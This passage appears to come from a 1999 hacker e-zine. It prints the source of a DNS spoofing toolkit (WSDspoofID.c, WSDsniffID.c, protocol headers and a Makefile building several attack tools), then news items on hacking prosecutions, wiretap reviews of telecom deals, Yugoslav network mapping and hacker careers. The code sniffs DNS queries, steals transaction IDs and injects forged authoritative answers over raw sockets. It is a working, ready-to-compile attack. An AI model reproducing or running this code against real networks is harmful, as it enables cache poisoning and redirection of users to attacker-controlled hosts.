dnssend->que_num = htons(1);
dnssend->rep_num = htons(0);

i = makepacketQS(data2, namefake, TYPE_A);
udp_send(sraw, s_ipns, d_ip,2600+con, 53, buf1, DNSHDRSIZE+i);

printf("Question sent...please wait\n");

while(1) {
buf = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */

ip = (struct iphdr *)(buf+ETHHDRSIZE);
udp = (struct udphdr *)(buf+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buf+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buf+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);

if (ip->protocol == IPPROTO_UDP) {
printf("[%s:%d ->", (char *)inet_ntoa(ip->saddr), ntohs(udp->source));
printf("%s:%d]\n", (char *)inet_ntoa(ip->daddr), ntohs(udp->dest));
}

if (ip->protocol == 17)
if (ip->saddr.s_addr == d_ip)
if (ip->daddr.s_addr == s_ipns)
if (udp->dest == htons(53))
if (dnsrecv->qr == 0) {
printf("We have the packet!\n");

ID = dnsrecv->id; /* We have the id. */

printf("the current id of %s is %d \n", argv[2],
ntohs(ID));

DA_ID = ntohs(ID);

printf("Sending the spoof...\n");
dnsspoof(dnstrust, argv[2], spoofname, spoofip,
DA_ID,type);

printf("Spoof sent...\n");

exit(0);
}
}

}
----[END of WSDspoofID.c ]----


----[WSDsniffID.c]----
/* ******************************************************* */
/* w00w00 LAN ID Sniffer Super Raw */
/* ------------------------------------------------------- */
/* w00w00 Security Development (WSD) */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */

#include <pcap.h>

#include "WSD-spoof.c"
#include "dns.h"
#include "WSD-DNS2.c"

#define ERROR -1
#define DNSHDRSIZE 12
#define VERSION "v0.4"

int ETHHDRSIZE;

void usage() {
printf("Usage: WSDsniffID <device> <IP> <name> <type of spoof[1,12]>\n");
printf("Example: WSDsniffID eth0 \"127.0.0.1\" \"www.its.me.com\"\n");
printf("Raw-Powa (WSD)\n");

exit(ERROR);
}


void main(int argc, char **argv)
{
int sraw, on = 1, tmp1, type;

char *buffer;
char *data, *data2;

struct pcap *pcap_d;
struct pcap_pkthdr h;

struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv, *dnssend;

char host[255];
char tmp2[255];
char ebuf[255];
char buffer2[1024];
char spoofip[255], spoofname[255];

unsigned char names[255];


printf("w00w00 LAN ID SNIFFER! Super Raw\n");
printf("w00w00 Security Development (WSD)\n");
printf("WSD@w00w00.org\n");


if (argc < 2) usage();
if (strstr(argv[1], "ppp0")) ETHHDRSIZE = 0;
else ETHHDRSIZE = 14;

if (strlen(argv[2]) > sizeof(spoofip) - 1) {
fprintf(stderr, "argv[2] too long: %s\n", argv[2]);
exit(ERROR);
}

if (strlen(argv[3]) > sizeof(spoofip) - 1) {
fprintf(stderr, "argv[3] too long: %s\n", argv[3]);
exit(ERROR);
}

strcpy(spoofip, argv[2]);
strcpy(spoofname, argv[3]);
type = atoi(argv[4]);

dnssend = (struct dnshdr *)buffer2;
data2 = (char *)(buffer2+12);

bzero(host, sizeof(host));
bzero(buffer2, sizeof(buffer2));


sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}

if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("setsockopt");
exit(ERROR);
}

/* open pcap descriptor */
pcap_d = pcap_open_live(argv[1], sizeof(buffer), 0, 100, ebuf);

while(1) {
buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */

ip = (struct iphdr *)(buffer+ETHHDRSIZE);
udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);

if (ip->protocol == 17)
if (udp->dest == htons(53))
if (dnsrecv->qr == 0) {
strcpy(names, data);
nameformat(names, host);

printf("We have a DNS question from %s, which wants: %s!\n",
(char *)inet_ntoa(ip->saddr), host);

bzero(host, sizeof(host));

printf("The question has a type %d "
"and type of the query is %d\n",
ntohs(*((u_short *)(data+strlen(data)+1))),
ntohs(*((u_short *)(data+strlen(data)+2+1))));

printf("Making the spoofed packet...\n");

/* Here we are going to start making the spoofed packet */

memcpy(dnssend, dnsrecv, DNSHDRSIZE+strlen(names)+5);

dnssend->id=dnsrecv->id; /* The ID */
dnssend->aa=1; /* I have the authority */
dnssend->ra=1; /* I have the recusion */
dnssend->qr=1; /* It's an answer */
dnssend->rep_num = htons(1); /* I have one awnser */


printf("ID = %d, Number of question = %d, "
"number of anwser = %d\n",
dnssend->id, ntohs(dnssend->que_num),
ntohs(dnssend->rep_num));

printf("Question..\n");
printf("domainename = %s\n", data2);
printf("type of question = %d\n",
ntohs(*((u_short *)(data2+strlen(names)+1))));
printf("type of query = %d\n",
ntohs(*((u_short *)(data2+strlen(names)+1+2))));

if (type == TYPE_PTR) {
tmp1 = strlen(names)+5;
strcpy(data2+tmp1, names);
tmp1 = tmp1+strlen(names)+1;

bzero(tmp2, sizeof(tmp2));
nameformat(spoofname, tmp2);

*((u_short *)(data2+tmp1)) = htons(TYPE_PTR);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(strlen((tmp2)+1));

strcpy((data2+tmp1+2+2+4+2), tmp2);

tmp1 = tmp1 +strlen(tmp2)+ 1;
}

if (type == TYPE_A) {
tmp1 = strlen(names)+5;
strcpy(data2+tmp1, names);
tmp1 = tmp1+strlen(names)+1;
*((u_short *)(data2+tmp1)) = htons(TYPE_A);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(4);
*((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(spoofip);
}

printf("Answer..\n");
printf("domainname = %s\n", tmp2);
printf("type = %d\n", ntohs(*((u_short *)(data2+tmp1))));
printf("classe = %d\n", ntohs(*((u_short *)(data2+tmp1+2))));
printf("time to live = %lu\n",
ntohl(*((u_long *)(data2+tmp1+2+2))));
printf("resource data length = %d\n",
ntohs(*((u_short *)(data2+tmp1+2+2+4))));

printf("IP = %s\n",
(char *)inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2))));

/* Now tmp1 == the total length of packet dns without the */
/* dnshdr. */
tmp1 = tmp1+2+2+4+2+4;

udp_send(sraw, ip->daddr, ip->saddr, ntohs(udp->dest),
ntohs(udp->source), buffer2, DNSHDRSIZE+tmp1);
}
}
}
----[END of WSDsniffID.c ]----


----[udp.h ]----
struct udphdr {
u_short source; /* source port */
u_short dest; /* destination port */
u_short len; /* udp length */
u_short check; /* udp checksum */
};
----[END of udp.h]----

----[ dns.h ]----
#define DNSHDRSIZE 12

struct dnshdr {
unsigned short int id;

unsigned char rd:1;
unsigned char tc:1;
unsigned char aa:1;
unsigned char opcode:4;
unsigned char qr:1;

unsigned char rcode:4;
unsigned char unused:2;
unsigned char pr:1;
unsigned char ra:1;

unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
};
----[ END of dns.h ]----


----[ ip.h ]----
/* adapted from tcpdump */

#ifndef IPVERSION
#define IPVERSION 4
#endif /* IPVERISON */

struct iphdr {
u_char ihl:4, /* header length */
version:4; /* version */
u_char tos; /* type of service */
short tot_len; /* total length */
u_short id; /* identification */
short off; /* fragment offset field */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
u_char ttl; /* time to live */
u_char protocol; /* protocol */
u_short check; /* checksum */
struct in_addr saddr, daddr; /* source and dest address */
};

#ifndef IP_MAXPACKET
#define IP_MAXPACKET 65535
#endif /* IP_MAXPACKET */

----[ END of ip.h ]----

----[bpf.h]----
/*-
* Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* This code is derived from the Stanford/CMU enet packet filter,
* (net/enet.c) distributed as part of 4.3BSD, and code contributed
* to Berkeley by Steven McCanne and Van Jacobson both of Lawrence
* Berkeley Laboratory.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the University of
* California, Berkeley and its contributors.
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* @(#)bpf.h 7.1 (Berkeley) 5/7/91
*
* @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
*/


#ifndef BPF_MAJOR_VERSION

/* BSD style release date */
#define BPF_RELEASE 199606

typedef int bpf_int32;
typedef u_int bpf_u_int32;

/*
* Alignment macros. BPF_WORDALIGN rounds up to the next
* even multiple of BPF_ALIGNMENT.
*/

#define BPF_ALIGNMENT sizeof(bpf_int32)
#define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1))

#define BPF_MAXINSNS 512
#define BPF_MAXBUFSIZE 0x8000
#define BPF_MINBUFSIZE 32

/*
* Structure for BIOCSETF.
*/

struct bpf_program {
u_int bf_len;
struct bpf_insn *bf_insns;
};

/*
* Struct returned by BIOCGSTATS.
*/

struct bpf_stat {
u_int bs_recv; /* number of packets received */
u_int bs_drop; /* number of packets dropped */
};

/*
* Struct return by BIOCVERSION. This represents the version number of
* the filter language described by the instruction encodings below.
* bpf understands a program iff kernel_major == filter_major &&
* kernel_minor >= filter_minor, that is, if the value returned by the
* running kernel has the same major number and a minor number equal
* equal to or less than the filter being downloaded. Otherwise, the
* results are undefined, meaning an error may be returned or packets
* may be accepted haphazardly.
* It has nothing to do with the source code version.
*/

struct bpf_version {
u_short bv_major;
u_short bv_minor;
};
/* Current version number of filter architecture. */
#define BPF_MAJOR_VERSION 1
#define BPF_MINOR_VERSION 1

/*
* BPF ioctls
*
* The first set is for compatibility with Sun's pcc style
* header files. If your using gcc, we assume that you
* have run fixincludes so the latter set should work.
*/

#if (defined(sun) || defined(ibm032)) && !defined(__GNUC__)
#define BIOCGBLEN _IOR(B,102, u_int)
#define BIOCSBLEN _IOWR(B,102, u_int)
#define BIOCSETF _IOW(B,103, struct bpf_program)
#define BIOCFLUSH _IO(B,104)
#define BIOCPROMISC _IO(B,105)
#define BIOCGDLT _IOR(B,106, u_int)
#define BIOCGETIF _IOR(B,107, struct ifreq)
#define BIOCSETIF _IOW(B,108, struct ifreq)
#define BIOCSRTIMEOUT _IOW(B,109, struct timeval)
#define BIOCGRTIMEOUT _IOR(B,110, struct timeval)
#define BIOCGSTATS _IOR(B,111, struct bpf_stat)
#define BIOCIMMEDIATE _IOW(B,112, u_int)
#define BIOCVERSION _IOR(B,113, struct bpf_version)
#define BIOCSTCPF _IOW(B,114, struct bpf_program)
#define BIOCSUDPF _IOW(B,115, struct bpf_program)
#else
#define BIOCGBLEN _IOR('B',102, u_int)
#define BIOCSBLEN _IOWR('B',102, u_int)
#define BIOCSETF _IOW('B',103, struct bpf_program)
#define BIOCFLUSH _IO('B',104)
#define BIOCPROMISC _IO('B',105)
#define BIOCGDLT _IOR('B',106, u_int)
#define BIOCGETIF _IOR('B',107, struct ifreq)
#define BIOCSETIF _IOW('B',108, struct ifreq)
#define BIOCSRTIMEOUT _IOW('B',109, struct timeval)
#define BIOCGRTIMEOUT _IOR('B',110, struct timeval)
#define BIOCGSTATS _IOR('B',111, struct bpf_stat)
#define BIOCIMMEDIATE _IOW('B',112, u_int)
#define BIOCVERSION _IOR('B',113, struct bpf_version)
#define BIOCSTCPF _IOW('B',114, struct bpf_program)
#define BIOCSUDPF _IOW('B',115, struct bpf_program)
#endif

/*
* Structure prepended to each packet.
*/

struct bpf_hdr {
struct timeval bh_tstamp; /* time stamp */
bpf_u_int32 bh_caplen; /* length of captured portion */
bpf_u_int32 bh_datalen; /* original length of packet */
u_short bh_hdrlen; /* length of bpf header (this struct
plus alignment padding) */

};
/*
* Because the structure above is not a multiple of 4 bytes, some compilers
* will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work.
* Only the kernel needs to know about it; applications use bh_hdrlen.
*/

#ifdef KERNEL
#define SIZEOF_BPF_HDR 18
#endif

/*
* Data-link level type codes.
*/

#define DLT_NULL 0 /* no link-layer encapsulation */
#define DLT_EN10MB 1 /* Ethernet (10Mb) */
#define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */
#define DLT_AX25 3 /* Amateur Radio AX.25 */
#define DLT_PRONET 4 /* Proteon ProNET Token Ring */
#define DLT_CHAOS 5 /* Chaos */
#define DLT_IEEE802 6 /* IEEE 802 Networks */
#define DLT_ARCNET 7 /* ARCNET */
#define DLT_SLIP 8 /* Serial Line IP */
#define DLT_PPP 9 /* Point-to-point Protocol */
#define DLT_FDDI 10 /* FDDI */
#define DLT_ATM_RFC1483 11 /* LLC/SNAP encapsulated atm */
#define DLT_RAW 12 /* raw IP */
#define DLT_SLIP_BSDOS 13 /* BSD/OS Serial Line IP */
#define DLT_PPP_BSDOS 14 /* BSD/OS Point-to-point Protocol */

/*
* The instruction encondings.
*/

/* instruction classes */
#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_LD 0x00
#define BPF_LDX 0x01
#define BPF_ST 0x02
#define BPF_STX 0x03
#define BPF_ALU 0x04
#define BPF_JMP 0x05
#define BPF_RET 0x06
#define BPF_MISC 0x07

/* ld/ldx fields */
#define BPF_SIZE(code) ((code) & 0x18)
#define BPF_W 0x00
#define BPF_H 0x08
#define BPF_B 0x10
#define BPF_MODE(code) ((code) & 0xe0)
#define BPF_IMM 0x00
#define BPF_ABS 0x20
#define BPF_IND 0x40
#define BPF_MEM 0x60
#define BPF_LEN 0x80
#define BPF_MSH 0xa0

/* alu/jmp fields */
#define BPF_OP(code) ((code) & 0xf0)
#define BPF_ADD 0x00
#define BPF_SUB 0x10
#define BPF_MUL 0x20
#define BPF_DIV 0x30
#define BPF_OR 0x40
#define BPF_AND 0x50
#define BPF_LSH 0x60
#define BPF_RSH 0x70
#define BPF_NEG 0x80
#define BPF_JA 0x00
#define BPF_JEQ 0x10
#define BPF_JGT 0x20
#define BPF_JGE 0x30
#define BPF_JSET 0x40
#define BPF_SRC(code) ((code) & 0x08)
#define BPF_K 0x00
#define BPF_X 0x08

/* ret - BPF_K and BPF_X also apply */
#define BPF_RVAL(code) ((code) & 0x18)
#define BPF_A 0x10

/* misc */
#define BPF_MISCOP(code) ((code) & 0xf8)
#define BPF_TAX 0x00
#define BPF_TXA 0x80

/*
* The instruction data structure.
*/

struct bpf_insn {
u_short code;
u_char jt;
u_char jf;
bpf_int32 k;
};

/*
* Macros for insn array initializers.
*/

#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }
#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }

#ifdef KERNEL
extern u_int bpf_filter();
extern void bpfattach();
extern void bpf_tap();
extern void bpf_mtap();
#else
#if __STDC__
extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
#endif
#endif

/*
* Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST).
*/

#define BPF_MEMWORDS 16

#endif

----[ END of bpf.h ]----

---[pcap.h ]---
/*
* Copyright (c) 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the Computer Systems
* Engineering Group at Lawrence Berkeley Laboratory.
* 4. Neither the name of the University nor of the Laboratory may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL)
*/


#ifndef lib_pcap_h
#define lib_pcap_h

#include <sys/types.h>
#include <sys/time.h>

#include <bpf.h>

#include <stdio.h>

#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4

#define PCAP_ERRBUF_SIZE 256

/*
* Compatibility for systems that have a bpf.h that
* predates the bpf typedefs for 64-bit support.
*/

#if BPF_RELEASE - 0 < 199406
typedef int bpf_int32;
typedef u_int bpf_u_int32;
#endif

typedef struct pcap pcap_t;
typedef struct pcap_dumper pcap_dumper_t;

/*
* The first record in the file contains saved values for some
* of the flags used in the printout phases of tcpdump.
* Many fields here are 32 bit ints so compilers won't insert unwanted
* padding; these files need to be interchangeable across architectures.
*/

struct pcap_file_header {
bpf_u_int32 magic;
u_short version_major;
u_short version_minor;
bpf_int32 thiszone; /* gmt to local correction */
bpf_u_int32 sigfigs; /* accuracy of timestamps */
bpf_u_int32 snaplen; /* max length saved portion of each pkt */
bpf_u_int32 linktype; /* data link type (DLT_*) */
};

/*
* Each packet in the dump file is prepended with this generic header.
* This gets around the problem of different headers for different
* packet interfaces.
*/

struct pcap_pkthdr {
struct timeval ts; /* time stamp */
bpf_u_int32 caplen; /* length of portion present */
bpf_u_int32 len; /* length this packet (off wire) */
};

/*
* As returned by the pcap_stats()
*/

struct pcap_stat {
u_int ps_recv; /* number of packets received */
u_int ps_drop; /* number of packets dropped */
u_int ps_ifdrop; /* drops by interface XXX not yet supported */
};

typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
const u_char *);

char *pcap_lookupdev(char *);
int pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
pcap_t *pcap_open_live(char *, int, int, int, char *);
pcap_t *pcap_open_offline(const char *, char *);
void pcap_close(pcap_t *);
int pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char*
pcap_next(pcap_t *, struct pcap_pkthdr *);
int pcap_stats(pcap_t *, struct pcap_stat *);
int pcap_setfilter(pcap_t *, struct bpf_program *);
void pcap_perror(pcap_t *, char *);
char *pcap_strerror(int);
char *pcap_geterr(pcap_t *);
int pcap_compile(pcap_t *, struct bpf_program *, char *, int,
bpf_u_int32);
/* XXX */
int pcap_freecode(pcap_t *, struct bpf_program *);
int pcap_datalink(pcap_t *);
int pcap_snapshot(pcap_t *);
int pcap_is_swapped(pcap_t *);
int pcap_major_version(pcap_t *);
int pcap_minor_version(pcap_t *);

/* XXX */
FILE *pcap_file(pcap_t *);
int pcap_fileno(pcap_t *);

pcap_dumper_t *pcap_dump_open(pcap_t *, const char *);
void pcap_dump_close(pcap_dumper_t *);
void pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);

/* XXX this guy lives in the bpf tree */
u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
char *bpf_image(struct bpf_insn *, int);
#endif

----[ END of pcap.h ]----

----[Makefile]----
# Version 0.2
SHELL = /bin/sh

# Uncomment this if you're not on Linux
#LIBS = -lsocket -lnsl -lpcap

CC = gcc
RM = /bin/rm

BIN = .
#BIN = w00w00/bins

LIBS = -lpcap
CFLAGS = -I. -L.

all: WSDkillDNS WSDspoofID WSDsniffID WSD-baddns WSD-IDpred

WSDkillDNS: WSDkillDNS.c
$(CC) $(CFLAGS) WSDkillDNS.c $(LIBS) -o $(BIN)/WSDkillDNS

WSDspoofID: WSDspoofID.c
$(CC) $(CFLAGS) WSDspoofID.c $(LIBS) -o $(BIN)/WSDspoofID

WSDsniffID: WSDsniffID.c
$(CC) $(CFLAGS) WSDsniffID.c $(LIBS) -o $(BIN)/WSDsniffID

WSD-baddns: WSD-baddns.c
$(CC) $(CFLAGS) WSD-baddns.c $(LIBS) -o $(BIN)/WSD-baddns

WSD-IDpred: WSD-IDpred.c
$(CC) $(CFLAGS) WSD-IDpred.c $(LIBS) -o $(BIN)/WSD-IDpred

----[END of Makefile ]----


@HWA

34.0 2 Swedish men charged with hacking U.S computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.usatoday.com/life/cyber/tech/ctf865.htm

2 charged for hacking U.S. computers

STOCKHOLM, Sweden (AP) -- Two Swedish men were charged
Monday with hacking into the computer systems of NASA and the U.S.
military.

Prosecutors said the intent apparently was not to steal anything, though
NASA reportedly spent a lot of money to make sure it didn't happen
again.

State prosecutor Yngve Rydberg called the crimes ''digital graffiti.'' Trial
was set for sometime this fall. Rydberg said he expected the two suburban
Stockholm men would be fined, but not jailed.

Charlie Malm and Joel Soederberg, both 24, were charged with violating
Sweden's computer laws and buying stolen equipment. Malm works at a
kindergarten, Rydberg for an Internet company.

Contacted by The Associated Press, Soederberg declined to comment.
Malm did not return a phone call placed to his home.

The NASA break-in allegedly occurred between October and December
1996. Soederberg was detained for two weeks in early 1997. Malm has
never been detained, Rydberg said.

''They didn't reach the holiest parts of the systems,'' he said, adding they
failed in an attempt to infect NASA's computer system with a virus.

The two also allegedly hacked into the computer systems of the U.S. Air
Force, Army and Marines, and the British Internet company Wide
Intellectual Resources, according to the charges.

NASA intends to demonstrate in the trial that Malm and Soederberg
''caused NASA great economic loss,'' court documents stated.

Thomas Talleur, director of NASA's computer crime unit, said the space
agency suffers a lot of intrusions.

''Anybody who provides as many open sites as we do leaves itself open to
attacks,'' he said in a telephone interview, adding that the agency mostly
investigates hacker intrusions when organized crime is suspected.

@HWA

35.0 Feds Delay network
~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlague
The feds are delaying a joint AT&T and British telecom
venture that would create a transatlantic telecom
network. Apparently the feds want to make sure they
have access to the network for wiretapping purposes
and to protect U.S. citizens against monitoring by
foreign governments. (For some reason I don't buy the
protection part.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2315342,00.html

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

DOJ, FBI delay AT&T-BT plans
By Kathy Chen and Rebecca Blumenstein, WSJ Interactive Edition
August 16, 1999 2:32 PM PT
URL:

U.S. officials are reviewing a planned joint venture between AT&T Corp. and British
Telecommunications PLC for its possible effects on law enforcement and national security,
delaying approval of the trans-Atlantic telecom agreement.

The Federal Bureau of Investigation and the Department of Justice's criminal division are holding
talks with the companies to resolve concerns over the plan to form a $10 billion global venture,
people familiar with the situation said.

The review appears to be part of a larger trend of law-enforcement agencies weighing in on
telecommunications deals. While the Federal Communications Commission traditionally has
overseen approval of such deals, the law-enforcement agencies may want to ensure they have
access to telecom networks for approved wiretapping operations, as well as that U.S. citizens are
protected against monitoring by foreign governments.

Growing investments by foreign companies and the introduction of new phone technologies are
complicating their efforts. The result has been increased participation by the agencies in vetting
telecom deals -- and delays for the companies.

Down but not out
While the agencies' concerns aren't likely to scuttle the AT&T-BT alliance, they are holding up its
approval. FCC officials have completed their review of the venture, which was announced in July
1998, but are awaiting word from the Justice Department and FBI, which have been in talks with
the firms for more than two months, according to people familiar with the situation.

Both AT&T (NYSE:T) and BT declined to comment on whether they are involved in talks with
law-enforcement agencies. But AT&T spokesman Jim McGann said, "We continue to believe
approval of the deal is on track."
The firms have said they would like to wrap up the deal by
October.

The Justice Department and FBI said they don't comment on specific cases.

The AT&T-BT venture aims to provide international companies with voice, video and data
services. The companies are combining international operations with about $10 billion in annual
revenue. European regulators, which recently have begun looking at telecom deals more carefully,
have approved the venture.

The specific nature of the FBI and Justice Department concerns remains unclear. If several past
and continuing cases offer any clue, they are likely to involve the agencies' desires to ensure
continued access to telecom networks for wiretapping purposes and to protect the privacy of U.S.
citizens.

In one of the first cases addressed by the agencies -- BT's planned acquisition of MCI
Communications announced in 1996 -- the FBI and Justice Department required the companies to
set up a separate subsidiary to take over all of MCI's business with U.S. government agencies.
The agencies also asked the companies to implement other security measures, such as agreeing
not to store billing information outside the U.S. for a certain period of time. That information is
sometimes subpoenaed by law-enforcement officials for criminal investigations, and storage in the
U.S. would facilitate continued access. The deal later fell through for unrelated reasons.

Law-enforcement agencies recently approved a merger between AirTouch Communications Inc.
and United Kingdom-based Vodafone, now Vodafone AirTouch PLC. AirTouch spokesman
Jonathan Marshall said the companies engaged in several months of negotiations with the agencies
over how to address security issues and agreed to conditions aimed at guaranteeing the
government's right to intercept communications over their U.S. wireless networks.

@HWA


36.0 The Effects of War on the Yugoslavian Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Michelle
While the NATO bombings may have had some
detrimental effects it doesn't look like Yugoslavia was
completely cut off during the war. The people at the
Internet Mapping Project compiled some graphical
network maps every day during the bombing. Pretty
interesting to look at. (Look for the mpeg at the
bottom.)

The Internet Mapping Project
http://www.cs.bell-labs.com/~ches/map
The Effects of War on the Yugoslavian Network
http://www.cs.bell-labs.com/~ches/map/yu/index.html

The effects of war on the Yugoslavian Network.
- Steven Branigan & Bill Cheswick
Starting at the end of March, we mapped the Yugoslavian network daily. A chart of the reachability shows that the network
was pretty stable until about May 3, 1999. Then, it changed drastically.

Below are some single day network map snapshots for the period from May 1st until May 10. As you can see from the
maps, a fair amount of the Yugoslavian network disappears and subsequently reappears on a daily basis.

We also mapped Bosnia during this period. Though our traces showed no common communication routes, quite a bit of
Bosnia went away at the same time. We suspect that the two countries probably share power grid connections.

http://www.cs.bell-labs.com/~ches/map/yu/index.html (maps)

@HWA


37.0 Survey Finds Internet Full of Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Using custom made software Liraz Siri, an 18 year old
from Israel, probed 36 million internet hosts for 18
common vulnerabilities. 450,000 of those servers were
vulnerable to attacks. While that is only 2% of the total
that is way to much.(Yes, we have mentioned this
before, but it is important.)

Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_184381,00.html
Interent Auditing Project Report - Via Security Focus
http://www.securityfocus.com/templates/forum-latest.html?forum=2


@HWA

38.0 Hacking Into an IT Career
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by WeldPond
Looking for a career in 'hacking'? David Del Torto,
director of technology for security services at Deloitte &
Touche in San Francisco gave out a few tips to the
attendees at the recent Chaos Computer Camp.

ComputerWorld
http://www.computerworld.com/home/news.nsf/all/9908124hackcareers

(Online News, 08/12/99 05:34 PM)



Hacking your way to an IT career
By Ann Harrison


ALTLANDSBERG, GERMANY -- At the first annual
Chaos Communication Camp, which took place outside
of Berlin last weekend (see story), hundreds of hackers
and their machines filled the main hack tent exchanging
information on the latest exploits and security tools. Most
were young, skillful and in demand by corporate
information technology departments.

The camp, which attracted some of the most talented
European and American hackers, was one of the largest
hacker gatherings in Europe so far this year.

David Del Torto, director of technology for security
services at Deloitte & Touche in San Francisco, agreed.
He noted that hackers like himself were working at all
the top five auditing and accounting firms.

Del Torto presented hacker career workshops with titles
such as "Take This Job and Ping It/Hacking The
Corporate Ladder For Fun & Profit."


The following are some of the tips he offered hackers
seeking corporate jobs:

- Write your own job description.

